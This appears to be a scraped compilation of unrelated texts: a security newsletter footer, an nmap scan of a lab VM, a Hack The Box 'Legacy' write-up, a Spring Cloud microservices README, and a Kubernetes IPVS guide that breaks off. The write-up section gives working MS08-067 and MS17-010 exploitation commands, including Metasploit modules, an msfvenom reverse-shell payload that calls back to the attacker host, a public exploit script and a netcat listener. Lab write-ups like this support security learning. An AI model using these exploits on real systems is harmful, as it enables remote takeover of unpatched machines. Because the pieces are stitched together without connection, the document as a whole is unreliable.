- Contributors : - Vikram, Paul miller, Tarang Parmar, Tuhin Bose and Alexandre ZANNI(Github Moderator).
</details>
## In the future,
We're planning to give separate column to our friends, active volunteers, community contributor and community/organization
that we'll collaborate. So if you're community, group and leaders do reach out to us at (resethackerofficial@gmail.com) .
<details>
<summary><b>Preview</b></summary>
For Leaders of Group and organization :
With help of this project, we like to bring Infosec community, groups, and leaders together.
Most importantly, learn and *work together* to give back to community.
For Community Contributors and individual :
We'll make sure to provide you parks/goodies based on your contribution.
We'll invite you to ResetHacker Github.
- Reverse engineering & Malware
- Forensic and OSINT
- Pentesting : ResetHacker Community
- CTF / Bug Bounty : ResetHacker Community
- Red Team : ResetHacker Community
- Blue Team : ResetHacker Community
- Incident response
- Threat Intelligence
- Researchers : ResetHacker Community
- Leaks : ResetHacker Community
- Rat, Malware, Ransomware
</details>
#### Volunteer Opportunities :
If you want to get involved in making a **Weekly Cybersecurity Update**, but aren't sure how ?
CONTACT "@Attr1b" on Telegram and contact us through mail "resethackerofficail@gmail.com"
Please write a reason How do you plan to improve it ?
#### I'm so grateful to all the [Source, Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.
#### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support reaching "Weekly InfoSec Update" to hacker would not have been possible.
### Wrapping Up
Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!
#### Remember to support us by contributing to repository and giving a Star.
<p align="center"> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="RESETHACKER-COMMUNITY" /> </p>
|
# Machine : Mr. Robot
## ip : 192.168.226.129
### nmap scan ``sudo nmap -sC -sV -A -Pn -p- -T4 -oA nmap/initial 192.168.226.129``
```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 01:38 EDT
Nmap scan report for 192.168.226.129
Host is up (0.00047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
MAC Address: 00:0C:29:FC:B3:9B (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (96%), Linux 3.2 - 3.8 (95%), Linux 3.13 or 4.2 (93%), Linux 3.16 (93%), Linux 4.2 (93%), Linux 4.4 (93%), Linux 2.6.32 - 3.13 (93%), Linux 3.18 (93%), Linux 3.16 - 4.6 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.226.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.44 seconds
```
|
# Legacy: 10.10.10.4
## Hints
- This machine is a great chance to test and learn about some very well known Windows SMB exploits
- Using `nmap` scripts will guide the way
- Metasploit makes this box a walk in the park
## nmap
Starting with the usual `nmap` scan. Interesting ports:
```none
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
```
## Recon
Looking at the operating system - it is a relic...
```none
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
```
Windows XP and SMB ports... makes me think of going straight for some remote code execution exploits, for which `nmap` has some excellent scanners. To list the available SMB scripts in the vulnerability category:
```none
└─$ ls /usr/share/nmap/scripts/ | grep smb | grep vuln
smb2-vuln-uptime.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
```
And to run `nmap` with these scripts.
```none
nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
```
And the results.
```none
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
```
## MS08-067 with Metasploit
This is a real blast from the past. MS08-067 was the first exploit I ever used in the Metasploit Framework - about 10 years ago... maybe even more! Exploitation is straightforward.
```none
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.4
set LHOST 10.10.14.4
exploit
```
This gives us a remote shell with Administrator rights. I think it took me longer to figure out where the flag was on Windows XP, than to exploit the machine!
```none
type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
```
## MS17-010 with Metasploit
Since I had not used Eternal Blue in `msfconsole`, though I would try (and document) the exploit.
```none
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.4
set LHOST 10.10.14.4
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82236988
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... mxhfiscf.exe
[*] 10.10.10.4:445 - Created \mxhfiscf.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \mxhfiscf.exe...
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.4:1031) at 2021-07-22 18:32:56 +1200
meterpreter >
```
Done! Metasploit is so easy with a discovered vulnerability. Lots of fun. But some other approaches, and learning something would be more fun.
## MS17-010 without Metasploit
Before we get started... this was a whirlwind adventure! Come along for the ride if you are interested in getting a stable and somewhat hassle-free environment to run the MS17-010 exploit! I had lots of problems along the way and resorted to a walkthrough that recommended a popular fork of the original `MS17-010` repo. This [fork was by a user named helviojunior](https://github.com/helviojunior/MS17-010), and provides a nice exploit. Kind of a "point-and-click", but without the Metasploit.
Let's just pretend for a second that we encounter no problems for the rest of this section, and can pass a reverse shell to the target. So, we should create said reverse shell. This is based on the instructions provided in the repo.
```none
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
```
At this point, I tried to get the exploit working and had numerous problems - mainly Python 2.7 errors, missing libraries, unavailable `impacket` etc., etc., etc. Went around and round trying to get Python, pip, and all the requirements working - with, and without, virtual environments. Eventually, I gave up, and let Docker do the hard lifting. I love this approach, being able to spin up a temporary container with only the essentials. And it means that other users can do the same steps - and get the same environment.
Start by installing Docker:
```none
sudo apt-get install docker
```
Then, like a good developer, setup up a folder structure for running a Docker container... In this case, my folder and container were called `cattime`.
```none
mkdir cattime
cd cattime
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
```
What we are doing is creating an empty `Dockerfile` to store the Docker configuration. And also adding `impacket` to the Python `requirements.txt` file - this makes it so we can download and install the `impacket` PyPi package in the container. In the `Dockerfile` I added the following content:
```none
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/cattime
COPY requirements.txt /opt/cattime
# This is funky
COPY rev.exe /opt/cattime
WORKDIR /opt/cattime
RUN pip install -r requirements.txt
```
A summary of what we are doing:
- `FROM python:2.7-alpine`: Use a slim Apline Linux image with Python 2.7.
- `RUN apk --update --no-cache add`: Install the `impacket` dependencies, as not much is on a default Apline Linux image. Also, install `git`.
- The remainder is setting `/opt/cattime` as our working directory and copying files across
One key thing - make sure `rev.exe` that you generated is in the directory that you are building the container. This entire container idea is based on this [Docker for Pentesters](https://blog.ropnop.com/docker-for-pentesters/#example-3---impacket) article which is awesome. There are about 10 examples to use Docker for pen-testing and CTF situations.
To be honest - we should probably be using a volume for things like adding `rev.exe` to the container - but I was in a rush. So, build the container using:
```none
sudo docker build -t cattime .
```
Start the container, and get a shell within the container:
```none
sudo docker run -it cattime /bin/sh
```
Download a good and easy ms-17-010 exploit using `git`:
```none
git clone https://github.com/helviojunior/MS17-010.git
```
Move into the freshly cloned repo, and run the exploit.
```none
cd MS17-010/
python send_and_execute.py 10.10.10.4 ../rev.exe
```
Note how we reference the `rev.exe` shell in the above command. Which should be in the parent folder. Make sure to have a netcat lister set up:
```none
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
```
Done!
## Lessons Learned
- Don't forget about the awesome `nmap` scripts and keep learning about them
- Docker for setting up unusual environments is awesome and should be used more
## Useful Resources
- [HTB: Legacy by 0xdf](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html)
- [Hack The Box — Legacy Writeup w/o Metasploit by Rana Khalil](https://ranakhalil101.medium.com/hack-the-box-legacy-writeup-w-o-metasploit-2d552d688336)
|
[![Build Status](https://travis-ci.org/sqshq/PiggyMetrics.svg?branch=master)](https://travis-ci.org/sqshq/PiggyMetrics)
[![codecov.io](https://codecov.io/github/sqshq/PiggyMetrics/coverage.svg?branch=master)](https://codecov.io/github/sqshq/PiggyMetrics?branch=master)
[![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/sqshq/PiggyMetrics/blob/master/LICENCE)
[![Join the chat at https://gitter.im/sqshq/PiggyMetrics](https://badges.gitter.im/sqshq/PiggyMetrics.svg)](https://gitter.im/sqshq/PiggyMetrics?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
# Piggy Metrics
Piggy Metrics is a simple financial advisor app built to demonstrate the [Microservice Architecture Pattern](http://martinfowler.com/microservices/) using Spring Boot, Spring Cloud and Docker. The project is intended as a tutorial, but you are welcome to fork it and turn it into something else!
<br>
![](https://cloud.githubusercontent.com/assets/6069066/13864234/442d6faa-ecb9-11e5-9929-34a9539acde0.png)
![Piggy Metrics](https://cloud.githubusercontent.com/assets/6069066/13830155/572e7552-ebe4-11e5-918f-637a49dff9a2.gif)
## Functional services
Piggy Metrics is decomposed into three core microservices. All of them are independently deployable applications organized around certain business domains.
<img width="880" alt="Functional services" src="https://cloud.githubusercontent.com/assets/6069066/13900465/730f2922-ee20-11e5-8df0-e7b51c668847.png">
#### Account service
Contains general input logic and validation: incomes/expenses items, savings and account settings.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /accounts/{account} | Get specified account data | |
GET | /accounts/current | Get current account data | × | ×
GET | /accounts/demo | Get demo account data (pre-filled incomes/expenses items, etc) | | ×
PUT | /accounts/current | Save current account data | × | ×
POST | /accounts/ | Register new account | | ×
#### Statistics service
Performs calculations on major statistics parameters and captures time series for each account. Datapoint contains values normalized to base currency and time period. This data is used to track cash flow dynamics during the account lifetime.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /statistics/{account} | Get specified account statistics | |
GET | /statistics/current | Get current account statistics | × | ×
GET | /statistics/demo | Get demo account statistics | | ×
PUT | /statistics/{account} | Create or update time series datapoint for specified account | |
#### Notification service
Stores user contact information and notification settings (reminders, backup frequency etc). Scheduled worker collects required information from other services and sends e-mail messages to subscribed customers.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /notifications/settings/current | Get current account notification settings | × | ×
PUT | /notifications/settings/current | Save current account notification settings | × | ×
#### Notes
- Each microservice has its own database, so there is no way to bypass API and access persistence data directly.
- MongoDB is used as a primary database for each of the services.
- All services are talking to each other via the Rest API
## Infrastructure
[Spring cloud](https://spring.io/projects/spring-cloud) provides powerful tools for developers to quickly implement common distributed systems patterns -
<img width="880" alt="Infrastructure services" src="https://cloud.githubusercontent.com/assets/6069066/13906840/365c0d94-eefa-11e5-90ad-9d74804ca412.png">
### Config service
[Spring Cloud Config](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html) is horizontally scalable centralized configuration service for the distributed systems. It uses a pluggable repository layer that currently supports local storage, Git, and Subversion.
In this project, we are going to use `native profile`, which simply loads config files from the local classpath. You can see `shared` directory in [Config service resources](https://github.com/sqshq/PiggyMetrics/tree/master/config/src/main/resources). Now, when Notification-service requests its configuration, Config service responses with `shared/notification-service.yml` and `shared/application.yml` (which is shared between all client applications).
##### Client side usage
Just build Spring Boot application with `spring-cloud-starter-config` dependency, autoconfiguration will do the rest.
Now you don't need any embedded properties in your application. Just provide `bootstrap.yml` with application name and Config service url:
```yml
spring:
application:
name: notification-service
cloud:
config:
uri: http://config:8888
fail-fast: true
```
##### With Spring Cloud Config, you can change application config dynamically.
For example, [EmailService bean](https://github.com/sqshq/PiggyMetrics/blob/master/notification-service/src/main/java/com/piggymetrics/notification/service/EmailServiceImpl.java) is annotated with `@RefreshScope`. That means you can change e-mail text and subject without rebuild and restart the Notification service.
First, change required properties in Config server. Then make a refresh call to the Notification service:
`curl -H "Authorization: Bearer #token#" -XPOST http://127.0.0.1:8000/notifications/refresh`
You could also use Repository [webhooks to automate this process](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_push_notifications_and_spring_cloud_bus)
##### Notes
- `@RefreshScope` doesn't work with `@Configuration` classes and doesn't ignores `@Scheduled` methods
- `fail-fast` property means that Spring Boot application will fail startup immediately, if it cannot connect to the Config Service.
### Auth service
Authorization responsibilities are extracted to a separate server, which grants [OAuth2 tokens](https://tools.ietf.org/html/rfc6749) for the backend resource services. Auth Server is used for user authorization as well as for secure machine-to-machine communication inside the perimeter.
In this project, I use [`Password credentials`](https://tools.ietf.org/html/rfc6749#section-4.3) grant type for users authorization (since it's used only by the UI) and [`Client Credentials`](https://tools.ietf.org/html/rfc6749#section-4.4) grant for service-to-service communciation.
Spring Cloud Security provides convenient annotations and autoconfiguration to make this really easy to implement on both server and client side. You can learn more about that in [documentation](http://cloud.spring.io/spring-cloud-security/spring-cloud-security.html).
On the client side, everything works exactly the same as with traditional session-based authorization. You can retrieve `Principal` object from the request, check user roles using the expression-based access control and `@PreAuthorize` annotation.
Each PiggyMetrics client has a scope: `server` for backend services and `ui` - for the browser. We can use `@PreAuthorize` annotation to protect controllers from an external access:
``` java
@PreAuthorize("#oauth2.hasScope('server')")
@RequestMapping(value = "accounts/{name}", method = RequestMethod.GET)
public List<DataPoint> getStatisticsByAccountName(@PathVariable String name) {
return statisticsService.findByAccountName(name);
}
```
### API Gateway
API Gateway is a single entry point into the system, used to handle requests and routing them to the appropriate backend service or by [aggregating results from a scatter-gather call](http://techblog.netflix.com/2013/01/optimizing-netflix-api.html). Also, it can be used for authentication, insights, stress and canary testing, service migration, static response handling and active traffic management.
Netflix opensourced [such an edge service](http://techblog.netflix.com/2013/06/announcing-zuul-edge-service-in-cloud.html) and Spring Cloud allows to use it with a single `@EnableZuulProxy` annotation. In this project, we use Zuul to store some static content (the UI application) and to route requests to appropriate the microservices. Here's a simple prefix-based routing configuration for the Notification service:
```yml
zuul:
routes:
notification-service:
path: /notifications/**
serviceId: notification-service
stripPrefix: false
```
That means all requests starting with `/notifications` will be routed to the Notification service. There is no hardcoded addresses, as you can see. Zuul uses [Service discovery](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#service-discovery) mechanism to locate Notification service instances and also [Circuit Breaker and Load Balancer](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#http-client-load-balancer-and-circuit-breaker), described below.
### Service Discovery
Service Discovery allows automatic detection of the network locations for all registered services. These locations might have dynamically assigned addresses due to auto-scaling, failures or upgrades.
The key part of Service discovery is the Registry. In this project, we use Netflix Eureka. Eureka is a good example of the client-side discovery pattern, where client is responsible for looking up the locations of available service instances and load balancing between them.
With Spring Boot, you can easily build Eureka Registry using the `spring-cloud-starter-eureka-server` dependency, `@EnableEurekaServer` annotation and simple configuration properties.
Client support enabled with `@EnableDiscoveryClient` annotation a `bootstrap.yml` with application name:
``` yml
spring:
application:
name: notification-service
```
This service will be registered with the Eureka Server and provided with metadata such as host, port, health indicator URL, home page etc. Eureka receives heartbeat messages from each instance belonging to the service. If the heartbeat fails over a configurable timetable, the instance will be removed from the registry.
Also, Eureka provides a simple interface where you can track running services and a number of available instances: `http://localhost:8761`
### Load balancer, Circuit breaker and Http client
#### Ribbon
Ribbon is a client side load balancer which gives you a lot of control over the behaviour of HTTP and TCP clients. Compared to a traditional load balancer, there is no need in additional network hop - you can contact desired service directly.
Out of the box, it natively integrates with Spring Cloud and Service Discovery. [Eureka Client](https://github.com/sqshq/PiggyMetrics#service-discovery) provides a dynamic list of available servers so Ribbon could balance between them.
#### Hystrix
Hystrix is the implementation of [Circuit Breaker Pattern](http://martinfowler.com/bliki/CircuitBreaker.html), which gives us a control over latency and network failures while communicating with other services. The main idea is to stop cascading failures in the distributed environment - that helps to fail fast and recover as soon as possible - important aspects of a fault-tolerant system that can self-heal.
Moreover, Hystrix generates metrics on execution outcomes and latency for each command, that we can use to [monitor system's behavior](https://github.com/sqshq/PiggyMetrics#monitor-dashboard).
#### Feign
Feign is a declarative Http client which seamlessly integrates with Ribbon and Hystrix. Actually, a single `spring-cloud-starter-feign` dependency and `@EnableFeignClients` annotation gives us a full set of tools, including Load balancer, Circuit Breaker and Http client with reasonable default configuration.
Here is an example from the Account Service:
``` java
@FeignClient(name = "statistics-service")
public interface StatisticsServiceClient {
@RequestMapping(method = RequestMethod.PUT, value = "/statistics/{accountName}", consumes = MediaType.APPLICATION_JSON_UTF8_VALUE)
void updateStatistics(@PathVariable("accountName") String accountName, Account account);
}
```
- Everything you need is just an interface
- You can share `@RequestMapping` part between Spring MVC controller and Feign methods
- Above example specifies just a desired service id - `statistics-service`, thanks to auto-discovery through Eureka
### Monitor dashboard
In this project configuration, each microservice with Hystrix on board pushes metrics to Turbine via Spring Cloud Bus (with AMQP broker). The Monitoring project is just a small Spring boot application with the [Turbine](https://github.com/Netflix/Turbine) and [Hystrix Dashboard](https://github.com/Netflix-Skunkworks/hystrix-dashboard).
Let's see observe the behavior of our system under load: Statistics Service imitates a delay during the request processing. The response timeout is set to 1 second:
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14194375/d9a2dd80-f7be-11e5-8bcc-9a2fce753cfe.png">
<img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127349/21e90026-f628-11e5-83f1-60108cb33490.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127348/21e6ed40-f628-11e5-9fa4-ed527bf35129.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127346/21b9aaa6-f628-11e5-9bba-aaccab60fd69.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127350/21eafe1c-f628-11e5-8ccd-a6b6873c046a.gif">
--- |--- |--- |--- |
| `0 ms delay` | `500 ms delay` | `800 ms delay` | `1100 ms delay`
| Well behaving system. Throughput is about 22 rps. Small number of active threads in the Statistics service. Median service time is about 50 ms. | The number of active threads is growing. We can see purple number of thread-pool rejections and therefore about 40% of errors, but the circuit is still closed. | Half-open state: the ratio of failed commands is higher than 50%, so the circuit breaker kicks in. After sleep window amount of time, the next request goes through. | 100 percent of the requests fail. The circuit is now permanently open. Retry after sleep time won't close the circuit again because a single request is too slow.
### Log analysis
Centralized logging can be very useful while attempting to identify problems in a distributed environment. Elasticsearch, Logstash and Kibana stack lets you search and analyze your logs, utilization and network activity data with ease.
### Distributed tracing
Analyzing problems in distributed systems can be difficult, especially trying to trace requests that propagate from one microservice to another.
[Spring Cloud Sleuth](https://cloud.spring.io/spring-cloud-sleuth/) solves this problem by providing support for the distributed tracing. It adds two types of IDs to the logging: `traceId` and `spanId`. `spanId` represents a basic unit of work, for example sending an HTTP request. The traceId contains a set of spans forming a tree-like structure. For example, with a distributed big-data store, a trace might be formed by a PUT request. Using `traceId` and `spanId` for each operation we know when and where our application is as it processes a request, making reading logs much easier.
The logs are as follows, notice the `[appname,traceId,spanId,exportable]` entries from the Slf4J MDC:
```text
2018-07-26 23:13:49.381 WARN [gateway,3216d0de1384bb4f,3216d0de1384bb4f,false] 2999 --- [nio-4000-exec-1] o.s.c.n.z.f.r.s.AbstractRibbonCommand : The Hystrix timeout of 20000ms for the command account-service is set lower than the combination of the Ribbon read and connect timeout, 80000ms.
2018-07-26 23:13:49.562 INFO [account-service,3216d0de1384bb4f,404ff09c5cf91d2e,false] 3079 --- [nio-6000-exec-1] c.p.account.service.AccountServiceImpl : new account has been created: test
```
- *`appname`*: The name of the application that logged the span from the property `spring.application.name`
- *`traceId`*: This is an ID that is assigned to a single request, job, or action
- *`spanId`*: The ID of a specific operation that took place
- *`exportable`*: Whether the log should be exported to [Zipkin](https://zipkin.io/)
## Infrastructure automation
Deploying microservices, with their interdependence, is much more complex process than deploying a monolithic application. It is really important to have a fully automated infrastructure. We can achieve following benefits with Continuous Delivery approach:
- The ability to release software anytime
- Any build could end up being a release
- Build artifacts once - deploy as needed
Here is a simple Continuous Delivery workflow, implemented in this project:
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14159789/0dd7a7ce-f6e9-11e5-9fbb-a7fe0f4431e3.png">
In this [configuration](https://github.com/sqshq/PiggyMetrics/blob/master/.travis.yml), Travis CI builds tagged images for each successful git push. So, there are always the `latest` images for each microservice on [Docker Hub](https://hub.docker.com/r/sqshq/) and older images, tagged with git commit hash. It's easy to deploy any of them and quickly rollback, if needed.
## Let's try it out
Note that starting 8 Spring Boot applications, 4 MongoDB instances and a RabbitMq requires at least 4Gb of RAM.
#### Before you start
- Install Docker and Docker Compose.
- Change environment variable values in `.env` file for more security or leave it as it is.
- Build the project: `mvn package [-DskipTests]`
#### Production mode
In this mode, all latest images will be pulled from Docker Hub.
Just copy `docker-compose.yml` and hit `docker-compose up`
#### Development mode
If you'd like to build images yourself, you have to clone the repository and build artifacts using maven. After that, run `docker-compose -f docker-compose.yml -f docker-compose.dev.yml up`
`docker-compose.dev.yml` inherits `docker-compose.yml` with additional possibility to build images locally and expose all containers ports for convenient development.
If you'd like to start applications in Intellij Idea you need to either use [EnvFile plugin](https://plugins.jetbrains.com/plugin/7861-envfile) or manually export environment variables listed in `.env` file (make sure they were exported: `printenv`)
#### Important endpoints
- http://localhost:80 - Gateway
- http://localhost:8761 - Eureka Dashboard
- http://localhost:9000/hystrix - Hystrix Dashboard (Turbine stream link: `http://turbine-stream-service:8080/turbine/turbine.stream`)
- http://localhost:15672 - RabbitMq management (default login/password: guest/guest)
## Contributions are welcome!
PiggyMetrics is open source, and would greatly appreciate your help. Feel free to suggest and implement any improvements.
|
- [IPVS](#ipvs)
- [What is IPVS](#what-is-ipvs)
- [IPVS vs. IPTABLES](#ipvs-vs-iptables)
- [When IPVS falls back to IPTABLES](#when-ipvs-falls-back-to-iptables)
- [Run kube-proxy in IPVS mode](#run-kube-proxy-in-ipvs-mode)
- [Prerequisite](#prerequisite)
- [Local UP Cluster](#local-up-cluster)
- [GCE Cluster](#gce-cluster)
- [Cluster Created by Kubeadm](#cluster-created-by-kubeadm)
- [Debug](#debug)
- [Check IPVS proxy rules](#check-ipvs-proxy-rules)
- [Why kube-proxy can't start IPVS mode](#why-kube-proxy-cant-start-ipvs-mode)
# IPVS
This document intends to show users
- what is IPVS
- difference between IPVS and IPTABLES
- how to run kube-proxy in IPVS mode and info on debugging
## What is IPVS
**IPVS (IP Virtual Server)** implements transport-layer load balancing, usually called Layer 4 LAN switching, as part of
Linux kernel.
IPVS runs on a host and acts as a load balancer in front of a cluster of real servers. IPVS can direct requests for TCP
and UDP-based services to the real servers, and make services of real servers appear as virtual services on a single IP address.
## IPVS vs. IPTABLES
IPVS mode was introduced in Kubernetes v1.8, goes beta in v1.9 and GA in v1.11. IPTABLES mode was added in v1.1 and become the default operating mode since v1.2. Both IPVS and IPTABLES are based on `netfilter`.
Differences between IPVS mode and IPTABLES mode are as follows:
1. IPVS provides better scalability and performance for large clusters.
2. IPVS supports more sophisticated load balancing algorithms than IPTABLES (least load, least connections, locality, weighted, etc.).
3. IPVS supports server health checking and connection retries, etc.
### When IPVS falls back to IPTABLES
IPVS proxier will employ IPTABLES in doing packet filtering, SNAT or masquerade.
Specifically, IPVS proxier will use ipset to store source or destination address of traffics that need DROP or do masquerade, to make sure the number of IPTABLES rules be constant, no matter how many services we have.
Here is the table of ipset sets that IPVS proxier used.
| set name | members | usage |
| :----------------------------- | ---------------------------------------- | ---------------------------------------- |
| KUBE-CLUSTER-IP | All service IP + port | Mark-Masq for cases that `masquerade-all=true` or `clusterCIDR` specified |
| KUBE-LOOP-BACK | All service IP + port + IP | masquerade for solving hairpin purpose |
| KUBE-EXTERNAL-IP | service external IP + port | masquerade for packages to external IPs |
| KUBE-LOAD-BALANCER | load balancer ingress IP + port | masquerade for packages to load balancer type service |
| KUBE-LOAD-BALANCER-LOCAL | LB ingress IP + port with `externalTrafficPolicy=local` | accept packages to load balancer with `externalTrafficPolicy=local` |
| KUBE-LOAD-BALANCER-FW | load balancer ingress IP + port with `loadBalancerSourceRanges` | package filter for load balancer with `loadBalancerSourceRanges` specified |
| KUBE-LOAD-BALANCER-SOURCE-CIDR | load balancer ingress IP + port + source CIDR | package filter for load balancer with `loadBalancerSourceRanges` specified |
| KUBE-NODE-PORT-TCP | nodeport type service TCP port | masquerade for packets to nodePort(TCP) |
| KUBE-NODE-PORT-LOCAL-TCP | nodeport type service TCP port with `externalTrafficPolicy=local` | accept packages to nodeport service with `externalTrafficPolicy=local` |
| KUBE-NODE-PORT-UDP | nodeport type service UDP port | masquerade for packets to nodePort(UDP) |
| KUBE-NODE-PORT-LOCAL-UDP | nodeport type service UDP port with `externalTrafficPolicy=local` | accept packages to nodeport service with `externalTrafficPolicy=local` |
IPVS proxier will fall back on IPTABLES in the following scenarios.
**1. kube-proxy starts with --masquerade-all=true**
If kube-proxy starts with `--masquerade-all=true`, IPVS proxier will masquerade all traffic accessing service Cluster IP, which behaves the same as what IPTABLES proxier. Suppose kube-proxy has flag `--masquerade-all=true` specified, then the IPTABLES installed by IPVS proxier should be like what is shown below.
```shell
# iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
Chain KUBE-MARK-MASQ (2 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst
